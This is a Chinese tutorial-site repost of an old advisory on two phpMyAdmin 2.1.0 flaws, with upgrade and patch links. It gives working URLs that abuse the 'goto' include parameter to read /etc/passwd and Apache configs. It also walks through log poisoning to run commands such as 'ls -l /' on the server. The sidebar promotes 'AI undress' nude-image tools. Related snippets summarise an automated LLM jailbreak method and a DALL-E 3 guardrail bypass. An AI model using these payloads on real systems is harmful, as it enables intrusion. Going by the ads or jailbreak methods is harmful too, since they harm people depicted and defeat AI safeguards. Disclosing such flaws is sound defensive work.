首页 后端开发 php教程 phpMyAdmin2.1.0存在两个漏洞_PHP

phpMyAdmin2.1.0存在两个漏洞_PHP

Jun 01, 2016 pm 12:25 PM
goto 存在 漏洞

phpmyadminphpMyAdmin漏洞

phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本:
phpMyAdmin 2.2.0。



1、目录遍历漏洞

攻击者通过提供如下的 URL:

http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)

http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd

能非法访问系统文件

有问题的代码在:
'include($goto);' in sql.php and in tbl_replace.php.

2、执行攻击者代码漏洞

通过使用全局可写日志文件,攻击者能在受影响服务器上执行任意代码。

首先,得到 Apache 配置文件以便知道日志文件存储位置:

http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No

可以看出,日志放在:
/var/log/httpd/error_log
/var/log/httpd/access_log

然后 telnet 到 端口80

# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is '^]'.
GET


^]
telnet> quit
Connection closed.
#

在 GET 请求之后,攻击者能将任意 PHP 代码上传

现在,可以用 Apache 用户身份远程运行命令了:

http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls -l /

受影响系统:
phpMyAdmin 2.1.0

解决方案:
建议:
1.使用 phpMyAdmin 2.2.0
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2.用户下载安装补丁:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff

摘自:52w.net
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

热AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智能驱动的应用程序,用于创建逼真的裸体照片

AI Clothes Remover

AI Clothes Remover

用于从照片中去除衣服的在线人工智能工具。

Undress AI Tool

Undress AI Tool

免费脱衣服图片

Clothoff.io

Clothoff.io

AI脱衣机

Video Face Swap

Video Face Swap

使用我们完全免费的人工智能换脸工具轻松在任何视频中换脸!

热工具

记事本++7.3.1

记事本++7.3.1

好用且免费的代码编辑器

SublimeText3汉化版

SublimeText3汉化版

中文版,非常好用

禅工作室 13.0.1

禅工作室 13.0.1

功能强大的PHP集成开发环境

Dreamweaver CS6

Dreamweaver CS6

视觉化网页开发工具

SublimeText3 Mac版

SublimeText3 Mac版

神级代码编辑软件(SublimeText3)

Java中的缓冲区溢出漏洞及其危害 Java中的缓冲区溢出漏洞及其危害 Aug 09, 2023 pm 05:57 PM

Java中的缓冲区溢出漏洞及其危害缓冲区溢出是指当我们向一个缓冲区写入超过其容量的数据时,会导致数据溢出到其他内存区域。这种溢出行为常常被黑客利用,可以导致代码执行异常、系统崩溃等严重后果。本文将介绍Java中的缓冲区溢出漏洞及其危害,同时给出代码示例以帮助读者更好地理解。Java中广泛使用的缓冲区类有ByteBuffer、CharBuffer、ShortB

20步内越狱任意大模型!更多'奶奶漏洞”全自动发现 20步内越狱任意大模型!更多'奶奶漏洞”全自动发现 Nov 05, 2023 pm 08:13 PM

不到一分钟、不超过20步,任意绕过安全限制,成功越狱大型模型!而且不必知道模型内部细节——只需要两个黑盒模型互动,就能让AI全自动攻陷AI,说出危险内容。听说曾经红极一时的“奶奶漏洞”已经被修复了:如今,面对“侦探漏洞”、“冒险家漏洞”和“作家漏洞”,人工智能应该采取何种应对策略呢?一波猛攻下来,GPT-4也遭不住,直接说出要给供水系统投毒只要……这样那样。关键这只是宾夕法尼亚大学研究团队晒出的一小波漏洞,而用上他们最新开发的算法,AI可以自动生成各种攻击提示。研究人员表示,这种方法相比于现有的

如何解决PHP语言开发中常见的文件上传漏洞? 如何解决PHP语言开发中常见的文件上传漏洞? Jun 10, 2023 am 11:10 AM

在Web应用程序的开发中,文件上传功能已经成为了基本的需求。这个功能允许用户向服务器上传自己的文件,然后在服务器上进行存储或处理。然而,这个功能也使得开发者更需要注意一个安全漏洞:文件上传漏洞。攻击者可以通过上传恶意文件来攻击服务器,从而导致服务器遭受不同程度的破坏。PHP语言作为广泛应用于Web开发中的语言之一,文件上传漏洞也是常见的安全问题之一。本文将介

Java中的逗号运算符漏洞和防护措施 Java中的逗号运算符漏洞和防护措施 Aug 10, 2023 pm 02:21 PM

Java中的逗号运算符漏洞和防护措施概述:在Java编程中,我们经常使用逗号运算符来同时执行多个操作。然而,有时候我们可能会忽略逗号运算符的一些潜在漏洞,这些漏洞可能导致意外的结果。本文将介绍Java中逗号运算符的漏洞,并提供相应的防护措施。逗号运算符的用法:逗号运算符在Java中的语法为expr1,expr2,可以说是一种序列运算符。它的作用是先计算ex

OpenAI DALL-E 3 模型存生成'不当内容”漏洞,一微软员工上报后反遭'封口令” OpenAI DALL-E 3 模型存生成'不当内容”漏洞,一微软员工上报后反遭'封口令” Feb 04, 2024 pm 02:40 PM

2月2日消息,微软软件工程部门经理ShaneJones最近发现OpenAI旗下的DALL-E3模型存在漏洞,据称可以生成一系列不适宜内容。ShaneJones向公司上报了该漏洞,但却被要求保密。然而,他最终还是决定向外界披露了这个漏洞。▲图源ShaneJones对外披露的报告本站注意到,ShaneJones在去年12月通过独立研究发现OpenAI文字生成图片的DALL-E3模型存在一项漏洞。这个漏洞能够绕过AI护栏(AIGuardrail),导致生成一系列NSFW不当内容。这个发现引起了广泛关注

Python中的指针是什么?Python中存在指针吗? Python中的指针是什么?Python中存在指针吗? Aug 19, 2023 am 11:09 AM

低级编程语言,如C或C++,经常使用指针来直接处理内存。它们能够实现有效的内存管理和低级数据操作。Thelow-levelcomplexitiesofmemoryadministrationareabstractedawayinPython,ahigh-levellanguage.Becauseofthis,PythonlacksexpresspointersinanequalmannerthatCorC++.Asanalternative,Pythonmakesuseofanideacompa

c语言中goto语句的含义是什么 c语言中goto语句的含义是什么 Dec 22, 2022 pm 06:00 PM

在c语言中,goto语句被称为无条件转移语句,允许把控制无条件转移到同一函数内的被标记的语句;语法“goto label;...label: statement;”,其中label可以是任何除C关键字以外的纯文本,它可以设置在C程序中goto语句的前面或者后面。

联想 5 月已发补丁,Phoenix UEFI 固件漏洞披露:影响数百款英特尔 PC CPU 型号 联想 5 月已发补丁,Phoenix UEFI 固件漏洞披露:影响数百款英特尔 PC CPU 型号 Jun 22, 2024 am 10:27 AM

本站6月21日消息,PhoenixSecureCoreUEFI固件被曝安全漏洞,影响数百款英特尔CPU设备,联想目前已经发布了新的固件更新修复该漏洞。本站从报道中获悉,该漏洞追踪编号为CVE-2024-0762,被称为“UEFICANHAZBUFFEROVERFLOW”,存在于PhoenixUEFI固件中的可信平台模块(TPM)配置中,是一个缓冲区溢出漏洞,可被利用在易受攻击的设备上执行任意代码。该漏洞由Eclypsium发现,他们在联想ThinkPadX1Carbon第7代和X1Yoga第4代

See all articles